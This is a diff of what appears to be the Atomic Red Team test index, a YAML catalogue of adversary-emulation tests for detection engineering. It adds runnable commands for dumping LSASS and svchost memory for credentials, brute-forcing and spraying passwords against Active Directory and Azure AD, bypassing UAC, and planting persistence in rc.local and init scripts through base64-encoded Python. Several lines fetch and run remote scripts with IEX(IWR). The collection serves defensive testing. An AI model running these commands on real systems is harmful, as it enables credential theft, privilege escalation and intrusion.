          1}
-        get_prereq_command: Invoke-WebRequest -Uri https://github.com/gtworek/PSBits/raw/f221a6db08cb3b52d5f8a2a210692ea8912501bf/PasswordStealing/NPPSpy/NPPSPY.dll
-          -OutFile "$env:Temp\NPPSPY.dll"
+        get_prereq_command: |-
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          Invoke-WebRequest -Uri https://github.com/gtworek/PSBits/raw/f221a6db08cb3b52d5f8a2a210692ea8912501bf/PasswordStealing/NPPSpy/NPPSPY.dll -OutFile "$env:Temp\NPPSPY.dll"
      executor:
        command: |-
          Copy-Item "$env:Temp\NPPSPY.dll" -Destination "C:\Windows\System32"
@@ -3952,6 +4066,25 @@ credential-access:
          C:\\Windows\\System32\\NPPSpy.dll -ErrorAction Ignore"
        name: powershell
        elevation_required: true
+    - name: Dump svchost.exe to gather RDP credentials
+      auto_generated_guid: d400090a-d8ca-4be0-982e-c70598a23de9
+      description: |
+        The svchost.exe contains the RDP plain-text credentials.
+        Source: https://www.n00py.io/2021/05/dumping-plaintext-rdp-credentials-from-svchost-exe/
+
+        Upon successful execution, you should see the following file created $env:TEMP\svchost-exe.dmp.
+      supported_platforms:
+      - windows
+      executor:
+        command: |
+          $ps = (Get-NetTCPConnection -LocalPort 3389 -State Established -ErrorAction Ignore)
+          if($ps){$id = $ps[0].OwningProcess} else {$id = (Get-Process svchost)[0].Id }
+          C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump $id $env:TEMP\svchost-exe.dmp full
+        cleanup_command: 'Remove-Item $env:TEMP\svchost-exe.dmp -ErrorAction Ignore
+
+'
+        name: powershell
+        elevation_required: true
  T1110.002:
    technique:
      external_references:
@@ -4224,10 +4357,10 @@ credential-access:
      - Containers
      identifier: T1110.001
    atomic_tests:
-    - name: Brute Force Credentials of all domain users via SMB
+    - name: Brute Force Credentials of all Active Directory domain users via SMB
      auto_generated_guid: '09480053-2f98-4854-be6e-71ae5f672224'
      description: 'Creates username and password files then attempts to brute force
-        on remote host
+        Active Directory accounts on remote host

 '
      supported_platforms:
@@ -4248,7 +4381,8 @@ credential-access:
          type: String
          default: "\\\\COMPANYDC1\\IPC$"
        domain:
-          description: Domain name of the target system we will brute force upon
+          description: Active Directory domain name of the target system we will brute
+            force upon
          type: String
          default: YOUR_COMPANY
      executor:
@@ -4259,11 +4393,14 @@ credential-access:
          echo "1q2w3e4r" >> #{input_file_passwords}
          echo "Password!" >> #{input_file_passwords}
          @FOR /F %n in (#{input_file_users}) DO @FOR /F %p in (#{input_file_passwords}) DO @net use #{remote_host} /user:#{domain}\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete #{remote_host} > NUL
-    - name: Brute Force Credentials of single domain user via LDAP against domain
-        controller (NTLM or Kerberos)
+        cleanup_command: |-
+          del #{input_file_users}
+          del #{input_file_passwords}
+    - name: Brute Force Credentials of single Active Directory domain user via LDAP
+        against domain controller (NTLM or Kerberos)
      auto_generated_guid: c2969434-672b-4ec8-8df0-bbb91f40e250
-      description: 'Attempt to brute force domain user on a domain controller, via
-        LDAP, with NTLM or Kerberos
+      description: 'Attempt to brute force Active Directory domain user on a domain
+        controller, via LDAP, with NTLM or Kerberos

 '
      supported_platforms:
@@ -4278,7 +4415,7 @@ credential-access:
          type: String
          default: Password1`n1q2w3e4r`nPassword!
        domain:
-          description: Domain FQDN
+          description: Active Directory domain FQDN
          type: String
          default: contoso.com
        auth:
@@ -4311,6 +4448,55 @@ credential-access:
            }
          }
          Write-Host "End of bruteforce"
+    - name: Brute Force Credentials of single Azure AD user
+      auto_generated_guid: 5a51ef57-299e-4d62-8e11-2d440df55e69
+      description: 'Attempt to brute force Azure AD user via AzureAD powershell module.
+
+'
+      supported_platforms:
+      - azure-ad
+      input_arguments:
+        username:
+          description: Account to bruteforce. We encourage users running this atomic
+            to add a valid microsoft account domain; for eg "bruce.wayne@<valid_ms_account.com>"
+          type: String
+          default: bruce.wayne@contoso.com
+        passwords:
+          description: List of passwords we will attempt to brute force with
+          type: String
+          default: Password1`n1q2w3e4r`nPassword!
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'AzureAD module must be installed.
+
+'
+        prereq_command: 'if (Get-Module AzureAD) {exit 0} else {exit 1}
+
+'
+        get_prereq_command: 'Install-Module -Name AzureAD -Force
+
+'
+      executor:
+        name: powershell
+        elevation_required: false
+        command: |
+          Import-Module -Name AzureAD
+
+          $passwords = "#{passwords}".split("{`n}")
+          foreach($password in $passwords) {
+            $PWord = ConvertTo-SecureString -String "$password" -AsPlainText -Force
+            $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
+            try {
+              Write-Host " [-] Attempting ${password} on account #{username}."
+              Connect-AzureAD -Credential $Credential 2>&1> $null
+              # if credentials aren't correct, it will break just above and goes into catch block, so if we're here we can display success
+              Write-Host " [!] #{username}:${password} are valid credentials!`r`n"
+              break
+            } catch {
+              Write-Host " [-] #{username}:${password} invalid credentials.`r`n"
+            }
+          }
+          Write-Host "End of bruteforce"
  T1555.005:
    technique:
      external_references:
@@ -4506,16 +4692,14 @@ credential-access:
      executor:
        name: powershell
        elevation_required: false
-        command: 'IEX (IWR ''https://raw.githubusercontent.com/dafthack/DomainPasswordSpray/94cb72506b9e2768196c8b6a4b7af63cebc47d88/DomainPasswordSpray.ps1''
-          -UseBasicParsing); Invoke-DomainPasswordSpray -Password Spring2017 -Domain
-          #{domain} -Force
-
-'
-    - name: Password spray all domain users with a single password via LDAP against
-        domain controller (NTLM or Kerberos)
+        command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (IWR 'https://raw.githubusercontent.com/dafthack/DomainPasswordSpray/94cb72506b9e2768196c8b6a4b7af63cebc47d88/DomainPasswordSpray.ps1' -UseBasicParsing); Invoke-DomainPasswordSpray -Password Spring2017 -Domain #{domain} -Force
+    - name: Password spray all Active Directory domain users with a single password
+        via LDAP against domain controller (NTLM or Kerberos)
      auto_generated_guid: f14d956a-5b6e-4a93-847f-0c415142f07d
      description: |
-        Attempt to brute force all domain user with a single password (called "password spraying") on a domain controller, via LDAP, with NTLM or Kerberos
+        Attempt to brute force all Active Directory domain users with a single password (called "password spraying") on a domain controller, via LDAP, with NTLM or Kerberos

        Prerequisite: AD RSAT PowerShell module is needed and it must run under a domain user (to fetch the list of all domain users)
      supported_platforms:
@@ -4564,6 +4748,66 @@ credential-access:
            }
          }
          Write-Host "End of password spraying"
+    - name: Password spray all Azure AD users with a single password
+      auto_generated_guid: a8aa2d3e-1c52-4016-bc73-0f8854cfa80a
+      description: |
+        Attempt to brute force all Azure AD users with a single password (called "password spraying") via AzureAD Powershell module.
+        Valid credentials are only needed to fetch the list of Azure AD users.
+      supported_platforms:
+      - azure-ad
+      input_arguments:
+        password:
+          description: Single password we will attempt to auth with (if you need several
+            passwords, then it is a bruteforce so see T1110.001)
+          type: String
+          default: P@ssw0rd!
+        valid_username:
+          description: Valid username to retrieve Azure AD users. We encourage users
+            running this atomic to add a valid microsoft account domain; for eg <valid_test_user>@<valid_ms_account.com>
+          type: String
+          default: bruce.wayne@contoso.com
+        valid_password:
+          description: Valid password to authenticate as valid_username in the <valid_ms_account>
+          type: string
+          default: iamthebatman
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'AzureAD module must be installed.
+
+'
+        prereq_command: 'if (Get-Module AzureAD) {exit 0} else {exit 1}
+
+'
+        get_prereq_command: 'Install-Module -Name AzureAD -Force
+
+'
+      executor:
+        name: powershell
+        elevation_required: false
+        command: |
+          Import-Module -Name AzureAD
+          $PWord = ConvertTo-SecureString -String "#{valid_password}" -AsPlainText -Force
+          $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{valid_username}", $Pword
+          Connect-AzureAD -Credential $Credential > $null
+
+          ($Users = Get-AzureADUser -All $true) > $null
+          Disconnect-AzureAD > $null
+          $PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
+
+          $Users | Foreach-Object {
+            $user = $_.UserPrincipalName
+            $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "$user", $Pword
+            try {
+              Write-Host " [-] Attempting #{password} on account ${user}."
+              Connect-AzureAD -Credential $Credential 2>&1> $null
+              # if credentials aren't correct, it will break just above and goes into catch block, so if we're here we can display success
+              Write-Host " [!] ${user}:#{password} are valid credentials!`r`n"
+              Disconnect-AzureAD > $null
+            } catch {
+              Write-Host " [-] ${user}:#{password} invalid credentials.`r`n"
+            }
+          }
+          Write-Host "End of password spraying"
  T1556.003:
    technique:
      external_references:
@@ -4825,7 +5069,106 @@ credential-access:
      x_mitre_is_subtechnique: true
      x_mitre_platforms:
      - Linux
-    atomic_tests: []
+      identifier: T1003.007
+    atomic_tests:
+    - name: Dump individual process memory with sh (Local)
+      auto_generated_guid: 7e91138a-8e74-456d-a007-973d67a0bb80
+      description: |
+        Using `/proc/$PID/mem`, where $PID is the target process ID, use shell utilities to
+        copy process memory to an external file so it can be searched or exfiltrated later.
+      supported_platforms:
+      - linux
+      input_arguments:
+        output_file:
+          description: Path where captured results will be placed
+          type: Path
+          default: "/tmp/T1003.007.bin"
+        script_path:
+          description: Path to script generating the target process
+          type: Path
+          default: "/tmp/T1003.007.sh"
+        pid_term:
+          description: Unique string to use to identify target process
+          type: String
+          default: T1003.007
+      dependencies:
+      - description: 'Script to launch target process must exist
+
+'
+        prereq_command: |
+          test -f #{script_path}
+          grep "#{pid_term}" #{script_path}
+        get_prereq_command: |
+          echo '#!/bin/sh' > #{script_path}
+          echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_path}
+      executor:
+        name: sh
+        elevation_required: true
+        command: |
+          sh #{script_path}
+          PID=$(pgrep -n -f "#{pid_term}")
+          HEAP_MEM=$(grep -E "^[0-9a-f-]* r" /proc/"$PID"/maps | grep heap | cut -d' ' -f 1)
+          MEM_START=$(echo $((0x$(echo "$HEAP_MEM" | cut -d"-" -f1))))
+          MEM_STOP=$(echo $((0x$(echo "$HEAP_MEM" | cut -d"-" -f2))))
+          MEM_SIZE=$(echo $((0x$MEM_STOP-0x$MEM_START)))
+          dd if=/proc/"${PID}"/mem of="#{output_file}" ibs=1 skip="$MEM_START" count="$MEM_SIZE"
+          grep -i "PASS" "#{output_file}"
+        cleanup_command: 'rm -f "#{output_file}"
+
+'
+    - name: Dump individual process memory with Python (Local)
+      auto_generated_guid: 437b2003-a20d-4ed8-834c-4964f24eec63
+      description: |
+        Using `/proc/$PID/mem`, where $PID is the target process ID, use a Python script to
+        copy a process's heap memory to an external file so it can be searched or exfiltrated later.
+      supported_platforms:
+      - linux
+      input_arguments:
+        output_file:
+          description: Path where captured results will be placed
+          type: Path
+          default: "/tmp/T1003.007.bin"
+        script_path:
+          description: Path to script generating the target process
+          type: Path
+          default: "/tmp/T1003.007.sh"
+        python_script:
+          description: Path to script generating the target process
+          type: Path
+          default: PathToAtomicsFolder/T1003.007/src/dump_heap.py
+        pid_term:
+          description: Unique string to use to identify target process
+          type: String
+          default: T1003.007
+      dependencies:
+      - description: 'Script to launch target process must exist
+
+'
+        prereq_command: |
+          test -f #{script_path}
+          grep "#{pid_term}" #{script_path}
+        get_prereq_command: |
+          echo '#!/bin/sh' > #{script_path}
+          echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_path}
+      - description: 'Requires Python
+
+'
+        prereq_command: "(which python || which python3 || which python2)\n"
+        get_prereq_command: 'echo "Python 2.7+ or 3.4+ must be installed"
+
+'
+      executor:
+        name: sh
+        elevation_required: true
+        command: |
+          sh #{script_path}
+          PID=$(pgrep -n -f "#{pid_term}")
+          PYTHON=$(which python || which python3 || which python2)
+          $PYTHON #{python_script} $PID #{output_file}
+          grep -i "PASS" "#{output_file}"
+        cleanup_command: 'rm -f "#{output_file}"
+
+'
  T1606.002:
    technique:
      external_references:
@@ -6721,8 +7064,9 @@ collection:
 '
      executor:
        command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
          Set-Clipboard -value "Atomic T1115 Test, grab data from clipboard via VBA"
-          IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
+          IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
          Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1115\src\T1115-macrocode.txt" -officeProduct "Word" -sub "GetClipboard"
        cleanup_command: 'Remove-Item "$env:TEMP\atomic_T1115_clipboard_data.txt"
          -ErrorAction Ignore
@@ -7636,11 +7980,15 @@ collection:
        'aureport --tty' or other audit.d reading tools to read the log output, which
        is binary.  Mac OS does not currently contain the pam_tty_audit.so library.
        \n"
-      prereq_command: 'test -f ''/usr/lib/pam/pam_tty_audit.so -o  /usr/lib64/security/pam_tty_audit.so''
+      dependencies:
+      - description: 'Checking if pam_tty_audit.so is installed

 '
-      get_prereq_command: 'echo "Sorry, you must install module pam_tty_audit.so and
-        recompile, for this test to work"
+        prereq_command: 'test -f ''/usr/lib/pam/pam_tty_audit.so -o  /usr/lib64/security/pam_tty_audit.so''
+
+'
+        get_prereq_command: 'echo "Sorry, you must install module pam_tty_audit.so
+          and recompile, for this test to work"

 '
      supported_platforms:
@@ -9141,7 +9489,8 @@ privilege-escalation:
        computer starts up various applications and may in fact drive you crazy. A
        reliable way to make the message box appear and verify the \nAppInit Dlls
        are loading is to start the notepad application. Be sure to run the cleanup
-        commands afterwards so you don't keep getting message boxes showing up\n"
+        commands afterwards so you don't keep getting message boxes showing up.\n\nNote:
+        If secure boot is enabled, this technique will not work. https://docs.microsoft.com/en-us/windows/win32/dlls/secure-boot-and-appinit-dlls\n"
      supported_platforms:
      - windows
      input_arguments:
@@ -10120,6 +10469,31 @@ privilege-escalation:
 '
        name: command_prompt
        elevation_required: true
+    - name: Bypass UAC using SilentCleanup task
+      auto_generated_guid: 28104f8a-4ff1-4582-bcf6-699dce156608
+      description: |
+        Bypass UAC using SilentCleanup task on Windows 8-10 using bat file from https://www.reddit.com/r/hacking/comments/ajtrws/bypassing_highest_uac_level_windows_810/
+
+        There is an auto-elevated task called SilentCleanup located in %windir%\system32\cleanmgr.exe This can be abused to elevate any file with Administrator privileges without prompting UAC (even highest level).
+
+        For example, we can set the windir registry kye to: "cmd /k REM "
+
+        And forcefully run SilentCleanup task:
+
+        schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I
+
+        REM will tell it to ignore everything after %windir% and treat it just as a NOTE. Therefore just executing cmd with admin privs.
+      supported_platforms:
+      - windows
+      input_arguments:
+        file_path:
+          description: Path to the bat file
+          type: String
+          default: PathToAtomicsFolder\T1548.002\src\T1548.002.bat
+      executor:
+        command: "#{file_path}\n"
+        name: command_prompt
+        elevation_required: false
  T1574.012:
    technique:
      external_references:
@@ -11196,9 +11570,9 @@ privilege-escalation:
    atomic_tests:
    - name: Enable Guest account with RDP capability and admin priviliges
      auto_generated_guid: 99747561-ed8d-47f2-9c91-1e5fde1ed6e0
-      description: After execution the Default Guest account will be enabled (Active)
-        and added to Administrators and Remote Desktop Users Group, and desktop will
-        allow multiple RDP connections
+      description: |
+        After execution the Default Guest account will be enabled (Active) and added to Administrators and Remote Desktop Users Group,
+        and desktop will allow multiple RDP connections.
      supported_platforms:
      - windows
      input_arguments:
@@ -11210,6 +11584,10 @@ privilege-escalation:
          description: Specify the guest password
          type: String
          default: Password123!
+        remove_rdp_access_during_cleanup:
+          description: Set to 1 if you want the cleanup to remove RDP access to machine
+          type: Integer
+          default: 0
      executor:
        command: |-
          net user #{guest_user} /active:yes
@@ -11222,8 +11600,9 @@ privilege-escalation:
          net user #{guest_user} /active:no >nul 2>&1
          net localgroup administrators #{guest_user} /delete >nul 2>&1
          net localgroup "Remote Desktop Users" #{guest_user} /delete >nul 2>&1
-          reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /f >nul 2>&1
-          reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /f >nul 2>&1
+          if #{remove_rdp_access_during_cleanup} NEQ 1 (echo Note: set remove_rdp_access_during_cleanup input argument to disable RDP access during cleanup)
+          if #{remove_rdp_access_during_cleanup} EQU 1 (reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /f >nul 2>&1)
+          if #{remove_rdp_access_during_cleanup} EQU 1 (reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /f >nul 2>&1)
        name: command_prompt
        elevation_required: true
  T1078.002:
@@ -13209,7 +13588,7 @@ privilege-escalation:
        command: |
          sudo cp #{path_malicious_plist} /Library/LaunchDaemons/#{plist_filename}
          sudo launchctl load -w /Library/LaunchDaemons/#{plist_filename}
-        cleanup: |
+        cleanup_command: |
          sudo launchctl unload /Library/LaunchDaemons/#{plist_filename}
          sudo rm /Library/LaunchDaemons/#{plist_filename}
  T1053.004:
@@ -14994,7 +15373,8 @@ privilege-escalation:

 '
      executor:
-        command: "IEX (iwr \"https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1\"
+        command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX
+          (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\"
          -UseBasicParsing) \nInvoke-MalDoc -macroFile \"PathToAtomicsFolder\\T1055.012\\src\\T1055.012-macrocode.txt\"
          -officeProduct \"#{ms_product}\" -sub \"Exploit\"\n"
        name: powershell
@@ -15128,13 +15508,15 @@ privilege-escalation:
 '
      executor:
        command: |
-          IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
          Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1055\src\x64\T1055-macrocode.txt" -officeProduct "Word" -sub "Execute"
        name: powershell
    - name: Remote Process Injection in LSASS via mimikatz
      auto_generated_guid: 3203ad24-168e-4bec-be36-f79b13ef8a83
      description: |
        Use mimikatz to remotely (via psexec) dump LSASS process content for RID 500 via code injection (new thread).
+        Especially useful against domain controllers in Active Directory environments.
        It must be executed in the context of a user who is privileged on remote `machine`.

        The effect of `/inject` is explained in <https://blog.3or.de/mimikatz-deep-dive-on-lsadumplsa-patch-and-inject.html>
@@ -15164,6 +15546,7 @@ privilege-escalation:
          if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
        get_prereq_command: |
          $mimikatz_path = cmd /c echo #{mimikatz_path}
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
          Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip"
          Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force
          New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null
@@ -15176,6 +15559,7 @@ privilege-escalation:

 '
        get_prereq_command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
          Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip"
          Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force
          New-Item -ItemType Directory (Split-Path "#{psexec_path}") -Force | Out-Null
@@ -15364,6 +15748,48 @@ privilege-escalation:
 '
        elevation_required: true
        name: bash
+    - name: rc.common
+      auto_generated_guid: c33f3d80-5f04-419b-a13a-854d1cbdbf3a
+      description: 'Modify rc.common
+
+'
+      supported_platforms:
+      - linux
+      executor:
+        name: bash
+        elevation_required: true
+        command: |
+          filename='/etc/rc.common';if [ ! -f $filename ];then sudo touch $filename;else sudo cp $filename /etc/rc.common.original;fi
+          printf '%s\n' '#!/bin/bash' | sudo tee /etc/rc.common
+          echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgcmMuY29tbW9uID4gL3RtcC9UMTAzNy4wMDQucmMuY29tbW9uJykK'))\"" | sudo tee -a /etc/rc.common
+          printf '%s\n' 'exit 0' | sudo tee -a /etc/rc.common
+          sudo chmod +x /etc/rc.common
+        cleanup_command: 'origfilename=''/etc/rc.common.original'';if [ ! -f $origfilename
+          ];then sudo rm /etc/rc.common;else sudo cp $origfilename /etc/rc.common
+          && sudo rm $origfilename;fi
+
+'
+    - name: rc.local
+      auto_generated_guid: 126f71af-e1c9-405c-94ef-26a47b16c102
+      description: 'Modify rc.local
+
+'
+      supported_platforms:
+      - linux
+      executor:
+        name: bash
+        elevation_required: true
+        command: |
+          filename='/etc/rc.local';if [ ! -f $filename ];then sudo touch $filename;else sudo cp $filename /etc/rc.local.original;fi
+          printf '%s\n' '#!/bin/bash' | sudo tee /etc/rc.local
+          echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgcmMubG9jYWwgPiAvdG1wL1QxMDM3LjAwNC5yYy5sb2NhbCcpCgo='))\"" | sudo tee -a /etc/rc.local
+          printf '%s\n' 'exit 0' | sudo tee -a /etc/rc.local
+          sudo chmod +x /etc/rc.local
+        cleanup_command: 'origfilename=''/etc/rc.local.original'';if [ ! -f $origfilename
+          ];then sudo rm /etc/rc.local;else sudo cp $origfilename /etc/rc.local &&
+          sudo rm $origfilename;fi
+
+'
  T1547.007:
    technique:
      created: '2020-01-24T18:15:06.641Z'
@@ -15979,7 +16405,8 @@ privilege-escalation:

 '
      executor:
-        command: "IEX (iwr \"https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1\"
+        command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX
+          (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\"
          -UseBasicParsing) \nInvoke-MalDoc -macroFile \"PathToAtomicsFolder\\T1053.005\\src\\T1053.005-macrocode.txt\"
          -officeProduct \"#{ms_product}\" -sub \"Scheduler\"\n"
        name: powershell
@@ -16992,6 +17419,48 @@ privilege-escalation:
          rm -rf #{systemd_service_path}/#{systemd_service_file}
          systemctl daemon-reload
        name: bash
+    - name: Create Systemd Service file,  Enable the service , Modify and Reload the
+        service.
+      auto_generated_guid: c35ac4a8-19de-43af-b9f8-755da7e89c89
+      description: "This test creates a systemd service unit file and enables it to
+        autostart on boot. Once service is created and enabled, it also modifies this
+        same service file showcasing both Creation and Modification of system process.
+        \n"
+      supported_platforms:
+      - linux
+      dependencies:
+      - description: 'System must be Ubuntu ,Kali OR CentOS.
+
+'
+        prereq_command: 'if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat
+          /etc/os-release | grep -i ID=kali) ] || [ $(cat /etc/os-release | grep -i
+          ''ID="centos"'') ]; then exit /b 0; else exit /b 1; fi;
+
+'
+        get_prereq_command: 'echo Please run from Ubuntu ,Kali OR CentOS.
+
+'
+      executor:
+        name: bash
+        elevation_required: true
+        command: "cat > /etc/init.d/T1543.002 << EOF\n#!/bin/bash\n### BEGIN INIT
+          INFO\n# Provides : Atomic Test T1543.002\n# Required-Start: $all\n# Required-Stop
+          : \n# Default-Start: 2 3 4 5\n# Default-Stop: \n# Short Description: Atomic
+          Test for Systemd Service Creation\n### END INIT INFO\npython3 -c \"import
+          os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBDcmVhdGluZyBTeXN0ZW1kIFNlcnZpY2UgVDE1NDMuMDAyID4gL3RtcC9UMTU0My4wMDIuc3lzdGVtZC5zZXJ2aWNlLmNyZWF0aW9uJykK'))\"\nEOF\n\nchmod
+          +x /etc/init.d/T1543.002\nif [ $(cat /etc/os-release | grep -i ID=ubuntu)
+          ] || [ $(cat /etc/os-release | grep -i ID=kali) ]; then update-rc.d T1543.002
+          defaults; elif [ $(cat /etc/os-release | grep -i 'ID=\"centos\"') ]; then
+          chkconfig T1543.002 on ; else echo \"Please run this test on Ubnutu , kali
+          OR centos\" ; fi ;\nsystemctl enable T1543.002\nsystemctl start T1543.002\n\necho
+          \"python3 -c \\\"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgYSBTeXN0ZW1kIFNlcnZpY2UgVDE1NDMuMDAyID4gL3RtcC9UMTU0My4wMDIuc3lzdGVtZC5zZXJ2aWNlLm1vZGlmaWNhdGlvbicpCg=='))\\\"\"
+          | sudo tee -a /etc/init.d/T1543.002\nsystemctl daemon-reload\nsystemctl
+          restart T1543.002\n"
+        cleanup_command: |
+          systemctl stop T1543.002
+          systemctl disable T1543.002
+          rm -rf /etc/init.d/T1543.002
+          systemctl daemon-reload
  T1053.006:
    technique:
      id: attack-pattern--a542bac9-7bc1-4da7-9a09-96f69e23cc21
@@ -17361,8 +17830,9 @@ privilege-escalation:
      supported_platforms:
      - windows
      executor:
-        command: IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1'
-          -UseBasicParsing); Get-System -Technique NamedPipe -Verbose
+        command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1' -UseBasicParsing); Get-System -Technique NamedPipe -Verbose
        name: powershell
        elevation_required: true
    - name: "`SeDebugPrivilege` token duplication"
@@ -17373,8 +17843,9 @@ privilege-escalation:
      supported_platforms:
      - windows
      executor:
-        command: IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1'
-          -UseBasicParsing); Get-System -Technique Token -Verbose
+        command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1' -UseBasicParsing); Get-System -Technique Token -Verbose
        name: powershell
        elevation_required: true
  T1546.005:
@@ -18780,7 +19251,7 @@ defense-evasion:
        command: |
          bitsadmin.exe /create #{bits_job_name}
          bitsadmin.exe /addfile #{bits_job_name} #{remote_file} #{local_file}
-          bitsadmin.exe /setnotifycmdline #{bits_job_name} #{command_path} ""
+          bitsadmin.exe /setnotifycmdline #{bits_job_name} #{command_path} NULL
          bitsadmin.exe /resume #{bits_job_name}
          timeout 5
          bitsadmin.exe /complete #{bits_job_name}
@@ -19315,6 +19786,31 @@ defense-evasion:
 '
        name: command_prompt
        elevation_required: true
+    - name: Bypass UAC using SilentCleanup task
+      auto_generated_guid: 28104f8a-4ff1-4582-bcf6-699dce156608
+      description: |
+        Bypass UAC using SilentCleanup task on Windows 8-10 using bat file from https://www.reddit.com/r/hacking/comments/ajtrws/bypassing_highest_uac_level_windows_810/
+
+        There is an auto-elevated task called SilentCleanup located in %windir%\system32\cleanmgr.exe This can be abused to elevate any file with Administrator privileges without prompting UAC (even highest level).
+
+        For example, we can set the windir registry kye to: "cmd /k REM "
+
+        And forcefully run SilentCleanup task:
+
+        schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I
+
+        REM will tell it to ignore everything after %windir% and treat it just as a NOTE. Therefore just executing cmd with admin privs.
+      supported_platforms:
+      - windows
+      input_arguments:
+        file_path:
+          description: Path to the bat file
+          type: String
+          default: PathToAtomicsFolder\T1548.002\src\T1548.002.bat
+      executor:
+        command: "#{file_path}\n"
+        name: command_prompt
+        elevation_required: false
  T1218.003:
    technique:
      external_references:
@@ -20096,7 +20592,8 @@ defense-evasion:
 '
      executor:
        command: |
-          IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
          Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1070.001\src\T1070.001-macrocode.txt" -officeProduct "Word" -sub "ClearLogs"
        name: powershell
        elevation_required: true
@@ -21298,9 +21795,9 @@ defense-evasion:
    atomic_tests:
    - name: Enable Guest account with RDP capability and admin priviliges
      auto_generated_guid: 99747561-ed8d-47f2-9c91-1e5fde1ed6e0
-      description: After execution the Default Guest account will be enabled (Active)
-        and added to Administrators and Remote Desktop Users Group, and desktop will
-        allow multiple RDP connections
+      description: |
+        After execution the Default Guest account will be enabled (Active) and added to Administrators and Remote Desktop Users Group,
+        and desktop will allow multiple RDP connections.
      supported_platforms:
      - windows
      input_arguments:
